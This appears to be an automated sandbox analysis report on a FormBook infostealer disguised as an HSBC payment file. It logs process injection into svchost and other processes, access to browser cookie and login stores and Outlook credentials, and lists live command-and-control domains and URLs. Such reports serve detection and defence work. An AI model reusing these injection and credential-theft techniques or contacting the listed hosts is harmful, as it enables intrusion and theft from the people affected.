Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: NULL target: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: NULL target: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\sdchange.exe

Thread register set: target process: 5924

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\sdchange.exe

Thread APC queued: target process: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2F60008

Jump to behavior

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_007787B1 LogonUserW,

0_2_007787B1

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00723B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00723B3A

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_007248D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_007248D7

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00784C7F mouse_event,

0_2_00784C7F

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe"	Jump to behavior
Source: C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe	Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00777CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00777CAF

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_0077874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0077874B

Source: rHSBCBank_Paymentswiftcpy.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: EqOUZfSIzU.exe, 00000004.00000000.2301924272.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955901555.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3956443413.0000000001790000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: rHSBCBank_Paymentswiftcpy.exe, EqOUZfSIzU.exe, 00000004.00000000.2301924272.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955901555.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3956443413.0000000001790000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: EqOUZfSIzU.exe, 00000004.00000000.2301924272.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955901555.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3956443413.0000000001790000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: EqOUZfSIzU.exe, 00000004.00000000.2301924272.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000004.00000002.3955901555.0000000000D90000.00000002.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3956443413.0000000001790000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_0074862B cpuid

0_2_0074862B

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00754E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00754E87

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00761E06 GetUserNameW,

0_2_00761E06

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_00753F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00753F3A

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe

Code function: 0_2_007249A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007249A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\sdchange.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: rHSBCBank_Paymentswiftcpy.exe	Binary or memory string: WIN_81
Source: rHSBCBank_Paymentswiftcpy.exe	Binary or memory string: WIN_XP
Source: rHSBCBank_Paymentswiftcpy.exe	Binary or memory string: WIN_XPe
Source: rHSBCBank_Paymentswiftcpy.exe	Binary or memory string: WIN_VISTA
Source: rHSBCBank_Paymentswiftcpy.exe	Binary or memory string: WIN_7
Source: rHSBCBank_Paymentswiftcpy.exe	Binary or memory string: WIN_8
Source: rHSBCBank_Paymentswiftcpy.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3957510457.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2378537810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2378859545.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3954264030.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3957685559.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2379212098.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3959254630.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3956974013.00000000023D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00796283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00796283
Source: C:\Users\user\Desktop\rHSBCBank_Paymentswiftcpy.exe	Code function: 0_2_00796747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00796747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
rHSBCBank_Paymentswiftcpy.exe	34%	ReversingLabs	Win32.Trojan.Nymeria
rHSBCBank_Paymentswiftcpy.exe	41%	Virustotal		Browse
rHSBCBank_Paymentswiftcpy.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.polarmuseum.info	0%	Virustotal	Browse
hentaistgma.net	6%	Virustotal	Browse
www.ngmr.xyz	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.polarmuseum.info	199.59.243.227	true	true	0%, Virustotal, Browse	unknown
hentaistgma.net	195.110.124.133	true	true	6%, Virustotal, Browse	unknown
www.ngmr.xyz	54.67.87.110	true	true	1%, Virustotal, Browse	unknown
www.tophcom.online	162.213.249.216	true	true		unknown
www.crochetpets.online	208.91.197.27	true	true		unknown
kovallo.cloud	81.2.196.19	true	true		unknown
www.donante-de-ovulos.biz	199.59.243.227	true	true		unknown
www.n0pme6.top	198.44.251.203	true	true		unknown
inf30027group23.xyz	221.121.144.149	true	true		unknown
www.shopdj00.xyz	unknown	unknown	true		unknown
www.kovallo.cloud	unknown	unknown	true		unknown
www.hentaistgma.net	unknown	unknown	true		unknown
www.inf30027group23.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://www.crochetpets.online/y9rm/?kT9p=HEdRnjuxtNGVPFRX3NZ2CbxO5KjoR5mZP9Y7+HX2gpvgKHiu4zeqhoni6TAVjjgJNor6P4ykumohRwGjoGuDnTy/l81TemUdGivRuw5GfSiykvy81pD0xLcKVnn388uSWX5E4Mc=&in1Hf=rx3dZnMxlRvDbR	true	unknown
http://www.n0pme6.top/81ii/	true	unknown
http://www.ngmr.xyz/ntib/?in1Hf=rx3dZnMxlRvDbR&kT9p=6gBoL4716wSvqjL5PCL9Otm46h/RO+qAgNOYViOcikg4H3EcrAY/v4xx2gixZebSxES1QV9P/IXhCYI/sCqyeCK3gvy3e15BfbqdhxqVigAySd7dFKOwRmIIBq2hI0q3F0AcNNQ=	true	unknown
http://www.n0pme6.top/81ii/?kT9p=iEYuKHcgXzrj54zBLQ0hZtaSJWaO6arULYSJgyArOy1vcIlOyDidBtx/KVwStm3n+ESjpSctJ0ezJOALnhKyScKD8qKcTeL6NPgmk/TuCnkayb3nWF3ZDNroKudPs/s9dqx/VNU=&in1Hf=rx3dZnMxlRvDbR	true	unknown
http://www.hentaistgma.net/qhr1/	true	unknown
http://www.kovallo.cloud/whrh/?kT9p=gnKfhumZE8ltP6GxVxsfSkoTPawS2VBtj7Y+npcg3eEMwAInvracgWsTZFjZCdkRXfgdTNdTzgCPtAFV2cUEHvPEtEwM8Ua8v+/63k/H/bL/ar8k5HyBDG0f7Adpr1HKjoqz2Rg=&in1Hf=rx3dZnMxlRvDbR	true	unknown
http://www.polarmuseum.info/rul7/	true	unknown
http://www.polarmuseum.info/rul7/?kT9p=IsmUDGhGjZ2KRgAKfB1HvhyyLqsJdQP3pRKzZVZQCTxvTYvFu3rbLrLYLQVbGlcBi+aKp17AAiqCJ8w25lZIlYoTQ+zVINLm/1UHvGbwh9Y2v06871qB8K3SuXDNUGwH3DJAZfI=&in1Hf=rx3dZnMxlRvDbR	true	unknown
http://www.kovallo.cloud/whrh/	true	unknown
http://www.tophcom.online/w48t/	true	unknown
http://www.tophcom.online/w48t/?in1Hf=rx3dZnMxlRvDbR&kT9p=jJf+uzLSIbfTebLlnllI962yuVk8Hw4tbleG5p05VL9UtkahhFlDUVJutvL9vCK8DEN3aeTkpXm8VBxSWq3LxvJEsjtiOsjWB/GCZl2Odas12ant1owrZYZ7neQtVdJoZOGoB8U=	true	unknown
http://www.inf30027group23.xyz/3ycg/	true	unknown
http://www.ngmr.xyz/ntib/	true	unknown
http://www.donante-de-ovulos.biz/g3wl/	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://dts.gnpge.com	firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.donante-de-ovulos.biz	EqOUZfSIzU.exe, 00000006.00000002.3959254630.0000000005588000.00000040.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://cdn.consentmanager.net	sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	sdchange.exe, 00000005.00000002.3960350765.0000000007FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.crochetpets.online/Pet_Apparel.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupEqkciy	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
http://www.crochetpets.online/Crochet_Patterns.cfm?fp=X0p2O9eTSzUb2xglLBhlRNvJoCK7vbkhQXY0xba2TwtupE	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
https://www.google.com	sdchange.exe, 00000005.00000002.3958580894.0000000005EEE000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.00000000063A4000.00000004.10000000.00040000.00000000.sdmp, sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000003C9E000.00000004.00000001.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.0000000004154000.00000004.00000001.00040000.00000000.sdmp	false		unknown
http://i4.cdn-image.com/__media__/pics/29590/bg1.png)	sdchange.exe, 00000005.00000002.3960262904.0000000007CE0000.00000004.00000800.00020000.00000000.sdmp, sdchange.exe, 00000005.00000002.3958580894.0000000005714000.00000004.10000000.00040000.00000000.sdmp, EqOUZfSIzU.exe, 00000006.00000002.3957328614.00000000034C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2675659639.00000000126E4000.00000004.80000000.00040000.00000000.sdmp	false		unknown
